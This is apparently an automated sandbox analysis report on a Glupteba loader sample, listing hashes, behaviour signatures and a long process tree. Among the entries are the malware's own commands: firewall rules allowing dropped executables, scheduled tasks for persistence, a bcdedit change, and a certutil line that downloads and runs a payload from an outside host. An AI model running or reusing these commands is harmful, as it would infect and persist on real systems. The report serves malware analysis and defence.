Analysis

  • max time kernel
    151s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    24-05-2022 13:47

General

  • Target

    ce66310aced7f576549cd39457bbf6a8425c1a0943510d75f7d7ce72b90fdfc0.exe

  • Size

    3MB

  • MD5

    2064e3bb7a3826464992decb043a1c13

  • SHA1

    ac04cc98f073e6ee77fb56430578b20b07bb9fb0

  • SHA256

    ce66310aced7f576549cd39457bbf6a8425c1a0943510d75f7d7ce72b90fdfc0

  • SHA512

    9dc5847a95df367f3be4d0dac56afdfd580c1d53b1ca2266cc06e22c9d7b708fcae8f7971fe9d9b848bdb1e8bf8ed9f61334d8a19e68fc400fde269bbb5614c7

Malware Config

Signatures 17

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload ⋅ 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess ⋅ 5 IoCs
  • Executes dropped EXE ⋅ 2 IoCs
  • Modifies Windows Firewall ⋅ 1 TTPs
  • Adds Run key to start application ⋅ 2 TTPs 1 IoCs
  • Checks installed software on the system ⋅ 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Modifies boot configuration data using bcdedit ⋅ 1 IoCs
  • Drops file in System32 directory ⋅ 8 IoCs
  • Drops file in Windows directory ⋅ 4 IoCs
  • Program crash ⋅ 64 IoCs
  • Creates scheduled task(s) ⋅ 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS ⋅ 64 IoCs
  • Modifies system certificate store ⋅ 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses ⋅ 8 IoCs
  • Suspicious use of AdjustPrivilegeToken ⋅ 21 IoCs
  • Suspicious use of WriteProcessMemory ⋅ 22 IoCs

Processes 152

  • C:\Users\Admin\AppData\Local\Temp\ce66310aced7f576549cd39457bbf6a8425c1a0943510d75f7d7ce72b90fdfc0.exe
    "C:\Users\Admin\AppData\Local\Temp\ce66310aced7f576549cd39457bbf6a8425c1a0943510d75f7d7ce72b90fdfc0.exe"
    Suspicious behavior: EnumeratesProcesses
    Suspicious use of AdjustPrivilegeToken
    PID:3764
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 332
      Program crash
      PID:2428
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 336
      Program crash
      PID:2352
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 336
      Program crash
      PID:4824
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 608
      Program crash
      PID:3760
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 708
      Program crash
      PID:4476
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 696
      Program crash
      PID:3536
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 696
      Program crash
      PID:3644
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 756
      Program crash
      PID:2340
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 772
      Program crash
      PID:4712
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 608
      Program crash
      PID:4368
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 860
      Program crash
      PID:4344
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 660
      Program crash
      PID:4308
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 644
      Program crash
      PID:316
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 816
      Program crash
      PID:2116
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 608
      Program crash
      PID:5092
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 764
      Program crash
      PID:4128
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 852
      Program crash
      PID:916
    • C:\Users\Admin\AppData\Local\Temp\ce66310aced7f576549cd39457bbf6a8425c1a0943510d75f7d7ce72b90fdfc0.exe
      "C:\Users\Admin\AppData\Local\Temp\ce66310aced7f576549cd39457bbf6a8425c1a0943510d75f7d7ce72b90fdfc0.exe"
      Adds Run key to start application
      Drops file in Windows directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:4764
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 296
        Program crash
        PID:3620
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 300
        Program crash
        PID:4676
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 300
        Program crash
        PID:2344
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 640
        Program crash
        PID:520
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 680
        Program crash
        PID:3892
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 696
        Program crash
        PID:4432
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 716
        Program crash
        PID:1232
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 732
        Program crash
        PID:2776
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 756
        Program crash
        PID:428
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\57c765cfdfac\57c765cfdfac\57c765cfdfac.exe" enable=yes"
        Suspicious use of WriteProcessMemory
        PID:1316
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\57c765cfdfac\57c765cfdfac\57c765cfdfac.exe" enable=yes
          PID:1500
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        Suspicious use of WriteProcessMemory
        PID:3128
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          PID:1656
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe ""
        Executes dropped EXE
        Drops file in System32 directory
        Drops file in Windows directory
        Modifies data under HKEY_USERS
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        PID:2660
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 332
          Program crash
          PID:3988
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 336
          Program crash
          PID:1868
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 336
          Program crash
          PID:4660
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 520
          Program crash
          PID:3580
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 544
          Program crash
          PID:4072
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 504
          Program crash
          PID:4380
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          Creates scheduled task(s)
          PID:3968
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          Creates scheduled task(s)
          PID:4104
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 848
          Program crash
          PID:1388
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 848
          Program crash
          PID:720
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 848
          Program crash
          PID:3104
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 848
          Program crash
          PID:2860
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 920
          Program crash
          PID:544
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 944
          Program crash
          PID:3084
        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
          Executes dropped EXE
          PID:2396
        • C:\Windows\system32\bcdedit.exe
          C:\Windows\Sysnative\bcdedit.exe /v
          Modifies boot configuration data using bcdedit
          PID:1676
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1020
          Program crash
          PID:360
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 964
          Program crash
          PID:5116
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1072
          Program crash
          PID:4792
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 456
          Program crash
          PID:116
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1128
          Program crash
          PID:2224
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1160
          Program crash
          PID:5092
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1176
          Program crash
          PID:2088
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1172
          Program crash
          PID:916
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1632
          Program crash
          PID:1184
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1820
          Program crash
          PID:3924
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1812
          Program crash
          PID:768
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1244
          Program crash
          PID:4172
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1552
          Program crash
          PID:1116
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1916
          Program crash
          PID:884
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1040
          Program crash
          PID:2408
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1896
          Program crash
          PID:4452
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1552
          Program crash
          PID:4224
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1660
          Program crash
          PID:3316
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 440
          Program crash
          PID:2308
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1068
          Program crash
          PID:4740
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1740
          Program crash
          PID:3128
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1716
          Program crash
          PID:2572
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1576
          Program crash
          PID:3432
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1716
          Program crash
          PID:3464
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1716
          PID:1868
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1920
          PID:4668
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1896
          PID:1560
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1848
          PID:3456
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1000
          PID:3836
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 456
          PID:2428
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 860
        Program crash
        PID:1936
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 868
      Program crash
      PID:1136
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3764 -ip 3764
    PID:1416
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3764 -ip 3764
    PID:3036
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3764 -ip 3764
    PID:4716
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3764 -ip 3764
    PID:1768
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3764 -ip 3764
    PID:2688
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3764 -ip 3764
    PID:3052
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3764 -ip 3764
    PID:1916
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3764 -ip 3764
    PID:3168
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3764 -ip 3764
    PID:4908
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3764 -ip 3764
    PID:3984
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3764 -ip 3764
    PID:2792
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 3764 -ip 3764
    PID:456
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 3764 -ip 3764
    PID:116
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3764 -ip 3764
    PID:1724
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3764 -ip 3764
    PID:684
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3764 -ip 3764
    PID:4540
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 3764 -ip 3764
    PID:4256
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
    Suspicious use of NtCreateUserProcessOtherParentProcess
    Suspicious use of AdjustPrivilegeToken
    Suspicious use of WriteProcessMemory
    PID:4648
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 3764 -ip 3764
    PID:556
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 4764 -ip 4764
    PID:4144
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4764 -ip 4764
    PID:1820
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4764 -ip 4764
    PID:2244
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4764 -ip 4764
    PID:1092
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4764 -ip 4764
    PID:3600
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 4764 -ip 4764
    PID:3016
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 4764 -ip 4764
    PID:4568
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 4764 -ip 4764
    PID:2248
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 4764 -ip 4764
    PID:984
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 4764 -ip 4764
    PID:2576
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 2660 -ip 2660
    PID:1780
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 2660 -ip 2660
    PID:3484
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 2660 -ip 2660
    PID:2772
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 2660 -ip 2660
    PID:1988
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 2660 -ip 2660
    PID:1504
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 2660 -ip 2660
    PID:4316
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 2660 -ip 2660
    PID:1872
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 2660 -ip 2660
    PID:1892
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 2660 -ip 2660
    PID:2764
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 2660 -ip 2660
    PID:3760
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 2660 -ip 2660
    PID:2988
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2660 -ip 2660
    PID:3188
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 2660 -ip 2660
    PID:3908
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2660 -ip 2660
    PID:4368
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2660 -ip 2660
    PID:1356
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2660 -ip 2660
    PID:4308
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 2660 -ip 2660
    PID:3116
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2660 -ip 2660
    PID:684
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 2660 -ip 2660
    PID:2520
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 2660 -ip 2660
    PID:4256
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 2660 -ip 2660
    PID:4616
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 2660 -ip 2660
    PID:2060
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 2660 -ip 2660
    PID:3772
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 2660 -ip 2660
    PID:1292
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 2660 -ip 2660
    PID:4680
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 2660 -ip 2660
    PID:3340
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 2660 -ip 2660
    PID:3680
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 2660 -ip 2660
    PID:4772
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 2660 -ip 2660
    PID:2756
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 2660 -ip 2660
    PID:1952
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 2660 -ip 2660
    PID:2076
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 2660 -ip 2660
    PID:1392
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 2660 -ip 2660
    PID:4892
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 2660 -ip 2660
    PID:2440
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 2660 -ip 2660
    PID:1936
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 2660 -ip 2660
    PID:8
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 2660 -ip 2660
    PID:3364
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 2660 -ip 2660
    PID:4504
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 2660 -ip 2660
    PID:2832
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 2660 -ip 2660
    PID:3980
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2660 -ip 2660
    PID:4076
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2660 -ip 2660
    PID:4896

Network

MITRE ATT&CK Matrix

Collection

    Command and Control

      Credential Access

        Discovery

        Execution

          Exfiltration

            Impact

              Initial Access

                Lateral Movement

                  Privilege Escalation

                    Replay Monitor

                    00:00 00:00

                    Downloads

                    • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                      MD5

                      13aaafe14eb60d6a718230e82c671d57

                      SHA1

                      e039dd924d12f264521b8e689426fb7ca95a0a7b

                      SHA256

                      f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

                      SHA512

                      ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

                    • C:\Windows\rss\csrss.exe
                      MD5

                      2064e3bb7a3826464992decb043a1c13

                      SHA1

                      ac04cc98f073e6ee77fb56430578b20b07bb9fb0

                      SHA256

                      ce66310aced7f576549cd39457bbf6a8425c1a0943510d75f7d7ce72b90fdfc0

                      SHA512

                      9dc5847a95df367f3be4d0dac56afdfd580c1d53b1ca2266cc06e22c9d7b708fcae8f7971fe9d9b848bdb1e8bf8ed9f61334d8a19e68fc400fde269bbb5614c7

                    • C:\Windows\rss\csrss.exe
                      MD5

                      2064e3bb7a3826464992decb043a1c13

                      SHA1

                      ac04cc98f073e6ee77fb56430578b20b07bb9fb0

                      SHA256

                      ce66310aced7f576549cd39457bbf6a8425c1a0943510d75f7d7ce72b90fdfc0

                      SHA512

                      9dc5847a95df367f3be4d0dac56afdfd580c1d53b1ca2266cc06e22c9d7b708fcae8f7971fe9d9b848bdb1e8bf8ed9f61334d8a19e68fc400fde269bbb5614c7

                    • memory/1316-136-0x0000000000000000-mapping.dmp
                    • memory/1500-137-0x0000000000000000-mapping.dmp
                    • memory/1656-139-0x0000000000000000-mapping.dmp
                    • memory/1676-149-0x0000000000000000-mapping.dmp
                    • memory/2396-147-0x0000000000000000-mapping.dmp
                    • memory/2660-140-0x0000000000000000-mapping.dmp
                    • memory/2660-143-0x0000000001A00000-0x0000000001DA6000-memory.dmp
                    • memory/2660-144-0x0000000000400000-0x0000000001021000-memory.dmp
                    • memory/3128-138-0x0000000000000000-mapping.dmp
                    • memory/3764-130-0x0000000001528000-0x00000000018CE000-memory.dmp
                    • memory/3764-132-0x0000000000400000-0x0000000001021000-memory.dmp
                    • memory/3764-131-0x00000000018D0000-0x0000000001FC5000-memory.dmp
                    • memory/3968-145-0x0000000000000000-mapping.dmp
                    • memory/4104-146-0x0000000000000000-mapping.dmp
                    • memory/4764-135-0x0000000000400000-0x0000000001021000-memory.dmp
                    • memory/4764-134-0x00000000015EE000-0x0000000001994000-memory.dmp
                    • memory/4764-133-0x0000000000000000-mapping.dmp